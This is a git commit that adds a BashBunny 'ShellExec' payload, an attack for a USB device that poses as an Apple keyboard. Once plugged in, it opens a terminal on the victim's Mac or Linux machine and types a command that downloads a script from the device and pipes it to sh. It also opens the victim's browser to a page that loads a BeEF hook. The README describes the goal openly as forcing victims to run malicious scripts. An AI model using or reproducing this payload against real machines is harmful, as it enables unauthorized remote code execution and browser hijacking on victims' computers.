add ShellExec payload
parent
155d90bb23
commit
b30ff86c2c
|
@ -0,0 +1,6 @@
|
|||
!#/bin/bash
|
||||
|
||||
# opens browsers to the bunny's index.html page
|
||||
|
||||
[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1
|
||||
[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1
|
|
@ -0,0 +1 @@
|
|||
alert('This is where your evil JavaScript file would go')
|
|
@ -0,0 +1,12 @@
|
|||
<html>
|
||||
<head>
|
||||
<script type="text/javascript" src="http://172.16.64.1/hook.js"></script>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
Nothing to see here!
|
||||
</body>
|
||||
|
||||
</html>
|
||||
|
||||
|
|
@ -0,0 +1,49 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Title: ShellExec
|
||||
# Author: audibleblink
|
||||
# Target: Mac/Linux
|
||||
# Version: 1.0
|
||||
#
|
||||
# Create a web server on the BashBunny and forces
|
||||
# the victim download and execute a script.
|
||||
#
|
||||
# White | Ready
|
||||
# Ammber blinking | Waiting for server
|
||||
# Blue blinking | Attacking
|
||||
# Green | Finished
|
||||
|
||||
LED R G B
|
||||
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||
|
||||
source bunny_helpers.sh
|
||||
|
||||
# switch to payload directory
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION
|
||||
|
||||
# starting server
|
||||
LED R G 500
|
||||
python -c "import SimpleHTTPServer; import BaseHTTPServer; h=BaseHTTPServer.HTTPServer(('$HOST_IP', 80),SimpleHTTPServer.SimpleHTTPRequestHandler); h.serve_forever();" &> server.log &
|
||||
|
||||
# wait until port is listening
|
||||
while ! nc -z $HOST_IP 80; do sleep 0.2; done
|
||||
|
||||
# attack commences
|
||||
LED B 500
|
||||
|
||||
Q GUI SPACE
|
||||
Q DELAY 300
|
||||
Q STRING terminal
|
||||
Q DELAY 100
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
|
||||
# Q ALT F2 # swap with block above for linux
|
||||
# Q DELAY 100
|
||||
|
||||
Q STRING curl "http://$HOST_IP/evil.sh" \| sh
|
||||
# in case curl isn't installed
|
||||
# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
|
||||
Q ENTER
|
||||
|
||||
LED G
|
|
@ -0,0 +1,34 @@
|
|||
# ShellExec
|
||||
|
||||
Author: audibleblink
|
||||
Version: 1.0
|
||||
|
||||
## Description
|
||||
|
||||
Serves malicious scripts or web pages from the Bunny and forces
|
||||
victims to curl and execute those scripts. Scripts can also force
|
||||
browsers to open a url on the bunny to do things like serve BeEF
|
||||
hooks.
|
||||
|
||||
## Configuration
|
||||
|
||||
evil.py - script that is fetched with DuckyScript
|
||||
(provided script opens a web page that serves a BeEF hook )
|
||||
|
||||
hook.js - the aforementioned BeEF hook
|
||||
|
||||
index.html - BeEF hook delivery page
|
||||
|
||||
## Requirements
|
||||
|
||||
Just plug and play
|
||||
|
||||
## Status
|
||||
|
||||
| LED | Status |
|
||||
| --------- | ----------- |
|
||||
| White | Ready |
|
||||
| Amber blinking | Waiting for server |
|
||||
| Blue blinking | Attacking |
|
||||
| Green | Finished |
|
||||
|
Loading…
Reference in New Issue